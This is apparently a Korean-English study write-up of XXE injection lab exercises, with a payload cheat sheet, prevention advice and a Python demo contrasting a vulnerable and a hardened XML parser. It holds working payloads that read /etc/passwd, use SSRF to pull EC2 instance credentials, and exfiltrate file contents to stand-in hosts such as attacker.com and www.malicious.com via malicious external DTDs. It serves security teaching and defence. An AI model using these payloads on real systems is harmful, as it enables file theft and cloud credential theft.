XML Injection


🔎 What is XML (XXE)?

XML์€ "ํ™•์žฅ ๊ฐ€๋Šฅํ•œ ๋งˆํฌ์—… ์–ธ์–ด"๋กœ ๋ฐ์ดํ„ฐ๋ฅผ ์ €์žฅํ•˜๊ณ  ์ „์†กํ•˜๊ธฐ ์œ„ํ•ด ์„ค๊ณ„๋œ ์–ธ์–ด์ž…๋‹ˆ๋‹ค.
HTML๊ณผ ๋งˆ์ฐฌ๊ฐ€์ง€๋กœ XML์€ ํƒœ๊ทธ์™€ ํŠธ๋ฆฌ๊ตฌ์กฐ๋ฅผ ์‚ฌ์šฉํ•˜์ง€๋งŒ HTML๊ณผ ๋‹ฌ๋ฆฌ XML์€ ๋ฏธ๋ฆฌ ์ •์˜๋œ ํƒœ๊ทธ๋ฅผ ์‚ฌ์šฉํ•˜์ง€ ์•Š์œผ๋ฏ€๋กœ ํƒœ๊ทธ์— ๋ฐ์ดํ„ฐ๋ฅผ ์„ค๋ช…ํ•˜๋Š” ์ด๋ฆ„์„ ์ง€์ •ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ํ˜„์žฌ๋Š” JSON ํ˜•์‹์„ ์„ ํ˜ธํ•˜์—ฌ ์‚ฌ์šฉ๋นˆ๋„๊ฐ€ ์ค„์–ด๋“ค๊ณ  ์žˆ์Šต๋‹ˆ๋‹ค.

XML entities are a way of representing an item of data within an XML document, instead of using the data itself.

&lt; = <
&gt; = >

XML custom entities: XML allows custom entities to be defined within the DTD (document type definition).

<!DOCTYPE foo [ <!ENTITY myentity "my entity value" > ]>
Every occurrence of &myentity; in the document is replaced with the defined value, my entity value.

XML external entities are a type of custom entity whose definition lives outside of the DTD in which they are declared.
An external entity is declared with the SYSTEM keyword and must specify the URL from which the entity value is to be loaded.
Because the URL may use the file:// scheme, an external entity can also be loaded from a file on the server's filesystem.

<!DOCTYPE foo [ <!ENTITY ext SYSTEM "http://normal-website.com" > ]>
Loading an external entity from a file with the file:// scheme:
<!DOCTYPE foo [ <!ENTITY ext SYSTEM "file:///path/to/file" > ]>

🔎 What is XML (XXE) injection?

XML ๋ฌธ์„œ์—์„œ External Entities๋ฅผ ์ด์šฉํ•˜์—ฌ ๊ณต๊ฒฉ์ž๊ฐ€ ์˜๋„ํ•˜๋Š” ์™ธ๋ถ€ URL์„ ์‹คํ–‰์‹œ์ผœ ๊ณต๊ฒฉ์ž๊ฐ€ ๊ณต๊ฒฉ์„ ์ˆ˜ํ–‰ํ•˜๋Š” ์ทจ์•ฝ์ ์ž…๋‹ˆ๋‹ค.
XMLํŽ˜์ด๋กœ๋“œ๋ฅผ ์„œ๋ฒ„๋กœ ๋ณด๋‚ผ๋•Œ ํ—ค๋”์— Content-Type: application/xml ์„ค์ •ํ•˜๋Š” ๊ฒƒ์ด ๋„์›€์ด ๋  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<stockCheck>
<productId>&xxe;</productId>
<storeId>1</storeId>
</stockCheck>

แ„‰แ…ณแ„แ…ณแ„…แ…ตแ†ซแ„‰แ…ฃแ†บ 2021-11-21 แ„‹แ…ฉแ„’แ…ฎ 10 23 29

LAB

Exploiting XXE using external entities to retrieve files

๋ฌผํ’ˆ์˜ ์žฌ๊ณ ํŒŒ์•… ๋ฒ„ํŠผ์„ ํด๋ฆญ ์‹œ XML์„ ์‚ฌ์šฉํ•˜์—ฌ ์š”์ฒญํ•  ๋•Œ ์™ธ๋ถ€ ์—”ํ‹ฐํ‹ฐ๋ฅผ ์ •์˜ํ•˜์—ฌ passwd ํŒŒ์ผ์„ ๋ถˆ๋Ÿฌ์˜ค๋Š” ์ทจ์•ฝ์ ์ž…๋‹ˆ๋‹ค.

แ„‰แ…ณแ„แ…ณแ„…แ…ตแ†ซแ„‰แ…ฃแ†บ 2021-11-21 แ„‹แ…ฉแ„’แ…ฎ 10 40 11

If no specific defence against XXE is in place, the vulnerability can be used to read /etc/passwd.
The contents are not always shown in the browser, so be sure to check the raw response in the Burp proxy history.

// original request
<?xml version="1.0" encoding="UTF-8"?>
<stockCheck>
<productId>2</productId>
<storeId>1</storeId>
</stockCheck>

// attack payload
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<stockCheck>
<productId>&xxe;</productId>
<storeId>1</storeId>
</stockCheck>

แ„‰แ…ณแ„แ…ณแ„…แ…ตแ†ซแ„‰แ…ฃแ†บ 2021-11-21 แ„‹แ…ฉแ„’แ…ฎ 10 43 45

Exploiting XXE to perform SSRF attacks

XXE ์ทจ์•ฝ์ ์„ ์ด์šฉํ•˜์—ฌ SSRF ๊ณต๊ฒฉ์œผ๋กœ DTD์˜ URL์„ ๋ฐ˜๋ณต์ ์œผ๋กœ ์—…๋ฐ์ดํŠธํ•˜์—ฌ API๋ฅผ ํƒ์ƒ‰ํ•˜์—ฌ ์‹œํฌ๋ฆฟ ํ‚ค๊ฐ€ ํฌํ•จ๋œ JSON์„ ๋ฐ˜ํ™˜ํ•˜๋Š” ์ทจ์•ฝ์ ์ž…๋‹ˆ๋‹ค.

When the SSRF payload is submitted, the response reports an invalid product ID and reflects the value latest; append this to the URL.

// SSRF payload
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "http://169.254.169.254/"> ]>
<stockCheck>
<productId>&xxe;</productId>
<storeId>1</storeId>
</stockCheck>

แ„‰แ…ณแ„แ…ณแ„…แ…ตแ†ซแ„‰แ…ฃแ†บ 2021-11-22 แ„‹แ…ฉแ„’แ…ฎ 10 48 05

Appending the returned latest to the EC2 metadata base URL http://169.254.169.254/ returns the next path segment, meta-data; keep appending each returned segment to the URL in the same way.

แ„‰แ…ณแ„แ…ณแ„…แ…ตแ†ซแ„‰แ…ฃแ†บ 2021-11-22 แ„‹แ…ฉแ„’แ…ฎ 10 48 16

Following the listing to the end leads to an entry named admin under security-credentials, and fetching it returns the JSON document with the IAM access key and secret access key of the instance role: the SSRF attack through XXE against the EC2 metadata endpoint succeeds.

แ„‰แ…ณแ„แ…ณแ„…แ…ตแ†ซแ„‰แ…ฃแ†บ 2021-11-22 แ„‹แ…ฉแ„’แ…ฎ 10 48 46

Blind XXE with out-of-band interaction

๋ธ”๋ผ์ธ๋“œ XXE ์ทจ์•ฝ์ ์€ ์• ํ”Œ๋ฆฌ์ผ€์ด์…˜์ด XXE์ธ์ ์…˜์— ์ทจ์•ฝํ•˜์ง€๋งŒ ์‘๋‹ต ๋‚ด์—์„œ ์ •์˜๋œ ์™ธ๋ถ€ ์—”ํ‹ฐํ‹ฐ ๊ฐ’์„ ๋ฐ˜ํ™˜ํ•˜์ง€ ์•Š๋Š” ๊ฒฝ์šฐ ๋ฐœ์ƒํ•ฉ๋‹ˆ๋‹ค. ์ด๋Ÿด ๊ฒฝ์šฐ Burp pro ๋ฒ„์ „์—์„œ ์‚ฌ์šฉ๊ฐ€๋Šฅํ•œ testBurp Collaborator client</span>๋ฅผ ์‚ฌ์šฉํ•˜์—ฌ ๋Œ€์—ญ์™ธ ๊ณต๊ฒฉ(Out-of-band)์œผ๋กœ ๊ฒฐ๊ณผ๊ฐ’์„ ๋ฐ›์•„๋ณผ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

XML์„ ์‚ฌ์šฉํ•˜์—ฌ ์žฌ๊ณ ํŒŒ์•…์„ ์ง„ํ–‰ํ•˜๊ณ ์žˆ์ง€๋งŒ XML ์ธ์ ์…˜ ์ฝ”๋“œ๋ฅผ ์ž…๋ ฅํ•˜์˜€์„ ๋•Œ ๊ฒฐ๊ณผ๊ฐ’์„ ๋ฐ›์•„ ๋ณผ์ˆ˜ ์—†์Šต๋‹ˆ๋‹ค.


๊ฒฐ๊ณผ๊ฐ’์„ ํ™•์ธํ•  ์ˆ˜ ์—†์„๋•Œ Burp Collaborator client๋ฅผ ์‚ฌ์šฉํ•˜์—ฌ ๋ฒ„ํ”„ ์ฃผ์†Œ๋ฅผ ๋„ฃ์–ด์ฃผ๋ฉด ๊ฒฐ๊ณผ ์‘๋‹ต๊ฐ’์„ ํ™•์ธ ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.


Blind XXE with out-of-band interaction via XML parameter entities

Some input validation, or hardening of the XML parser in use, may block XXE attacks that use regular (general) entities.
In that case the attack can sometimes still be carried out with XML parameter entities. Parameter entities are a special kind of XML entity that can only be referenced elsewhere within the DTD.

// how a parameter entity is declared
<!ENTITY % myparameterentity "my parameter entity value" >

// testing for blind XXE with a parameter entity
<!DOCTYPE foo [ <!ENTITY % xxe SYSTEM "http://f2g9j7hhkax.web-attacker.com"> %xxe; ]>

Even though nothing is returned in the response, the interaction can be confirmed in the Burp Collaborator client.


Exploiting blind XXE to exfiltrate data using a malicious external DTD

This lab covers detecting a blind XXE vulnerability through out-of-band (OOB) interaction and how it can then be exploited.
By hosting a malicious DTD on an external server and having the XXE payload load it, sensitive data can be exfiltrated.

Host a DTD file like the following on the external server.

// URL = the Burp Collaborator address
<!ENTITY % file SYSTEM "file:///etc/hostname">
<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://f1hjrzeua66ijp8bi06rrkbeh5nvbk.burpcollaborator.net/?x=%file;'>">
%eval;
%exfil;


XXE Injection์„ ํ†ตํ•ด ๋ฏธ๋ฆฌ ์ƒ์„ฑํ•ด๋‘” URL ์ฃผ์†Œ๋ฅผ ๋ถˆ๋Ÿฌ์˜ค๋ฉด ๋ฏธ๋ฆฌ ์ž‘์„ฑํ•ด๋‘” ๊ณต๊ฒฉ ํŽ˜์ด๋กœ๋“œ๊ฐ€ ์‹คํ–‰๋˜๋ฉฐ hostname์„ ๋ถˆ๋Ÿฌ์˜ต๋‹ˆ๋‹ค.


Exploiting XInclude to retrieve files

When the XML document itself cannot be controlled (for example, the injected value is embedded server-side into an XML document, so the DOCTYPE cannot be modified), XInclude can be used instead, provided the parser has XInclude processing enabled.

<foo xmlns:xi="http://www.w3.org/2001/XInclude">
<xi:include parse="text" href="file:///etc/passwd"/></foo>


Exploiting blind XXE to retrieve data via error messages

๋ธ”๋ผ์ธ๋“œ XXE ์ธ์ ์…˜์„ ํ†ตํ•ด ๋ฏผ๊ฐํ•œ ๋ฐ์ดํ„ฐ๊ฐ€ ํฌํ•จ๋œ XML ์˜ค๋ฅ˜๋ฉ”์‹œ์ง€๋ฅผ ์ž…๋ ฅํ•˜์—ฌ ํ˜ธ์ถœํ•˜๋Š” ๋ฐฉ๋ฒ•์ž…๋‹ˆ๋‹ค.

exploit.dtd ํŒŒ์ผ ์ƒ์„ฑ (file:///invalid/%file ์„ ํ†ตํ•ด ์—๋Ÿฌ๊ตฌ๋ฌธ ์ž…๋ ฅ)

<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'file:///invalid/%file;'>">
%eval;
%exfil;


์ƒ์„ฑํ•œ exploit.dtd ํ˜ธ์ถœ ์‹œ /etc/passwd ํŒŒ์ผ ํ˜ธ์ถœ


Exploiting XXE to retrieve data by repurposing a local DTD

When an external DTD cannot be loaded (outbound connections are blocked), a DTD that already exists on the server's local filesystem can be repurposed.
When a document's DTD uses a mix of internal and external declarations, the internal DTD can redefine entities declared in the external DTD. This can be used to trigger a parsing error that contains sensitive data.

On Linux systems with the GNOME desktop environment (Ubuntu, Fedora, Debian, Red Hat, CentOS, etc.) a DTD file is usually present at /usr/share/yelp/dtd/docbookx.dtd.
Whether the file exists can be tested first.

// Probe: sending docbook.dtd (which does not exist) instead of docbookx.dtd produces an error, while docbookx.dtd does not, confirming the file is present and that parsing errors are reported
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY % local_dtd SYSTEM "file:///usr/share/yelp/dtd/docbook.dtd">
%local_dtd;
]>
<stockCheck><productId>1</productId><storeId>1</storeId></stockCheck>


Submit the local DTD payload. docbookx.dtd declares a parameter entity named ISOamsa (among others) and then references it; because the internal subset is processed first, our definition of ISOamsa wins, so when the local DTD references it our nested declarations run and the parser errors out with the contents of /etc/passwd in the path of the missing file.

// local DTD payload: redefine ISOamsa from docbookx.dtd to read /etc/passwd through an error message
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY % local_dtd SYSTEM "file:///usr/share/yelp/dtd/docbookx.dtd">
<!ENTITY % ISOamsa '
<!ENTITY &#x25; file SYSTEM "file:///etc/passwd">
<!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///nonexistent/&#x25;file;&#x27;>">
&#x25;eval;
&#x25;error;
'>
%local_dtd;
]>
<stockCheck><productId>1</productId><storeId>1</storeId></stockCheck>




๐Ÿ Cheat sheet

  • Classic XXE (/etc/passwd)
<?xml version="1.0"?><!DOCTYPE root [<!ENTITY test SYSTEM 'file:///etc/passwd'>]><root>&test;</root>
<?xml version="1.0"?>
<!DOCTYPE data [
<!ELEMENT data ANY>
<!ENTITY file SYSTEM "file:///etc/passwd">
]>
<data>&file;</data>
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]><foo>&xxe;</foo>
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///c:/boot.ini" >]><foo>&xxe;</foo>
  • Classic XXE Base64 encoded(/etc/passwd)
<!DOCTYPE test [ <!ENTITY % init SYSTEM "data://text/plain;base64,ZmlsZTovLy9ldGMvcGFzc3dk"> %init; ]><foo/>
  • PHP Wrapper inside XXE
<!DOCTYPE replace [<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=index.php"> ]>
<contacts>
  <contact>
    <name>Jean &xxe; Dupont</name>
    <phone>00 11 22 33 44</phone>
    <address>42 rue du CTF</address>
    <zipcode>75000</zipcode>
    <city>Paris</city>
  </contact>
</contacts>
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=http://10.0.0.3" >
]>
<foo>&xxe;</foo>
  • XInclude attacks
//When you can't modify the DOCTYPE element use the XInclude to target
<foo xmlns:xi="http://www.w3.org/2001/XInclude">
<xi:include parse="text" href="file:///etc/passwd"/></foo>
  • Exploiting XXE to perform SSRF attacks
//XXE can be combined with the SSRF vulnerability to target another service on the network.
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "http://internal.service/secret_pass.txt" >
]>
<foo>&xxe;</foo>
  • Error Based XXE
//Payload to trigger the XXE
<?xml version="1.0" ?>
<!DOCTYPE message [
    <!ENTITY % ext SYSTEM "http://attacker.com/ext.dtd">
    %ext;
]>
<message></message>

//Contents of ext.dtd
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>">
%eval;
%error;
  • Blind XXE / exploiting blind XXE to exfiltrate data out-of-band
//The easiest way to test for a blind XXE is to try to load a remote resource such as a Burp Collaborator.
<?xml version="1.0" ?>
<!DOCTYPE root [
<!ENTITY % ext SYSTEM "http://UNIQUE_ID_FOR_BURP_COLLABORATOR.burpcollaborator.net/x"> %ext;
]>
<r></r>

//Send the content of /etc/passwd to "www.malicious.com", you may receive only the first line.
//Caveat: a parameter-entity reference inside an entity value is not allowed in the internal subset
//(XML 1.0 WFC "PEs in Internal Subset"), so this variant only works when the declarations are
//served from an external DTD, as in the OOB example below. The URL also needs a scheme.
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY % xxe SYSTEM "file:///etc/passwd" >
<!ENTITY callhome SYSTEM "http://www.malicious.com/?%xxe;">
]>
<foo>&callhome;</foo>
  • XXE OOB Attack (Yunusov, 2013)
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE data SYSTEM "http://publicServer.com/parameterEntity_oob.dtd">
<data>&send;</data>

File stored on http://publicServer.com/parameterEntity_oob.dtd
<!ENTITY % file SYSTEM "file:///sys/power/image_size">
<!ENTITY % all "<!ENTITY send SYSTEM 'http://publicServer.com/?%file;'>">
%all;
  • XXE with local DTD
//In some case, outgoing connections are not possible from the web application. DNS names might even not resolve externally with a payload like this:
<!DOCTYPE root [<!ENTITY test SYSTEM 'http://h3l9e5soi0090naz81tmq5ztaaaaaa.burpcollaborator.net'>]>
<root>&test;</root>

//If error based exfiltration is possible, you can still rely on a local DTD to do concatenation tricks. Payload to confirm that error message include filename.
<!DOCTYPE root [
    <!ENTITY % local_dtd SYSTEM "file:///abcxyz/">

    %local_dtd;
]>
<root></root>

//Assuming payloads such as the previous return a verbose error. You can start pointing to local DTD. With an found DTD, you can submit payload such as the following payload. The content of the file will be place in the error message.
<!DOCTYPE root [
    <!ENTITY % local_dtd SYSTEM "file:///usr/share/yelp/dtd/docbookx.dtd">

    <!ENTITY % ISOamsa '
        <!ENTITY &#x25; file SYSTEM "file:///REPLACE_WITH_FILENAME_TO_READ">
        <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///abcxyz/&#x25;file;&#x27;>">
        &#x25;eval;
        &#x25;error;
        '>

    %local_dtd;
]>
<root></root>

👀 How to Prevent?

  • Disable DTD (DOCTYPE) processing in the XML parser entirely. If that is not possible, disable external general entities, external parameter entities and external DTD loading (e.g. never set libxml2's NOENT/DTDLOAD parse options; in Java/Xerces set the disallow-doctype-decl feature to true; in Python use defusedxml).
  • Disable XInclude (and XSLT) support unless it is needed, since XInclude works without a DOCTYPE.
  • Where entities must be accepted, validate the input against a strict schema and filter unexpected special characters, but treat this as defence in depth rather than the primary control.
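To make the prevention advice concrete, here is the first lab's stock-check request parsed two ways with Python's standard-library expat binding. This is an added example, not code from the original page or the lab: it shows where the parser asks the application to resolve a SYSTEM identifier, how an application that fetches it blindly leaks the file into productId, and how refusing any DOCTYPE (the first bullet above) kills the attack before an entity is ever declared. The passwd contents are a constructed stand-in written to a temp file so the demo never reads a real system file.

```python
import os
import pathlib
import tempfile
import urllib.request
import xml.parsers.expat as expat

# Same payload as the lab, with the file URL filled in by demo().
PAYLOAD_TEMPLATE = """<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "{url}"> ]>
<stockCheck>
<productId>&xxe;</productId>
<storeId>1</storeId>
</stockCheck>"""

# Constructed stand-in for /etc/passwd (not real data).
FAKE_PASSWD = "root:x:0:0:root:/root:/bin/bash\ncarlos:x:1000:1000::/home/carlos:/bin/bash\n"


class StockCheckRequest:
    """Collects the text of <productId> and <storeId>, as the lab back end would."""

    def __init__(self):
        self.fields = {}
        self._current = None

    def start(self, name, attrs):
        if name in ("productId", "storeId"):
            self._current = name
            self.fields.setdefault(name, "")

    def end(self, name):
        if name == self._current:
            self._current = None

    def chars(self, data):
        if self._current is not None:
            self.fields[self._current] += data


def _make_parser(handler):
    parser = expat.ParserCreate()
    parser.StartElementHandler = handler.start
    parser.EndElementHandler = handler.end
    parser.CharacterDataHandler = handler.chars
    return parser


def parse_vulnerable(xml_bytes):
    """Resolves external entities: the classic XXE misconfiguration."""
    handler = StockCheckRequest()
    parser = _make_parser(handler)

    def fetch_external_entity(context, base, system_id, public_id):
        # Application code that trusts the DTD: fetch whatever URL the client supplied
        # and parse the result as the entity's content, so it lands in <productId>.
        with urllib.request.urlopen(system_id) as resp:
            body = resp.read()
        child = parser.ExternalEntityParserCreate(context)  # inherits our handlers
        child.Parse(body, True)
        return 1

    parser.ExternalEntityRefHandler = fetch_external_entity
    parser.Parse(xml_bytes, True)
    return handler.fields


def parse_hardened(xml_bytes):
    """Rejects any DOCTYPE, so no entity (internal, external or parameter) can be declared."""
    handler = StockCheckRequest()
    parser = _make_parser(handler)

    def reject_dtd(doctype_name, system_id, public_id, has_internal_subset):
        raise ValueError("DOCTYPE not allowed in stock check requests")

    parser.StartDoctypeDeclHandler = reject_dtd
    # Defence in depth: even if a DTD slipped through, never resolve SYSTEM identifiers.
    parser.ExternalEntityRefHandler = lambda *args: 0
    parser.Parse(xml_bytes, True)
    return handler.fields


def demo():
    """Write the fake passwd file and replay the lab payload against both parsers."""
    with tempfile.NamedTemporaryFile("w", suffix=".passwd", delete=False) as f:
        f.write(FAKE_PASSWD)
        path = f.name
    try:
        payload = PAYLOAD_TEMPLATE.format(url=pathlib.Path(path).as_uri()).encode()
        leaked = parse_vulnerable(payload)["productId"]
        try:
            parse_hardened(payload)
            blocked = False
        except ValueError:
            blocked = True
        return leaked, blocked
    finally:
        os.unlink(path)


if __name__ == "__main__":
    leaked, blocked = demo()
    print("vulnerable parser returned productId:\n" + leaked)
    print("hardened parser rejected the payload:", blocked)
```

The point to take from the vulnerable half is that the parser never "does" the fetch itself: it hands the SYSTEM identifier to application code, and the bug is an application (or library default) that resolves it. Rejecting the DOCTYPE is the control that needs no allow-list of schemes or hosts, which is why it is the first recommendation above.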

📃 References